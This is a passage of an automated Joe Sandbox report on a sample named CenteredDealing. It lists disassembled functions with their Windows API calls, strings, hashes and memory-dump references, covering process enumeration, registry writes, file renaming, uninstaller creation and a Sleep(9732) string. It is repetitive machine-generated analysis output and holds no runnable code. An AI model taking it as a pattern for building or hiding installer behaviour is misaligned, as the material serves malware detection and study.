                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                                                                                                Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                • String ID: @%F$N$open
                                                                                                                                                                                                                                                                • API String ID: 3928313111-3849437375
                                                                                                                                                                                                                                                                • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                                                                                Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 565278875-1653569448
                                                                                                                                                                                                                                                                • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                                                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                                                                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                                                                                                Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Sleep(9732),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Sleep(9732),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(Sleep(9732),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: Sleep(9732)
                                                                                                                                                                                                                                                                • API String ID: 3734993849-2152357448
                                                                                                                                                                                                                                                                • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                                                                                                Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                Memory Dump Source
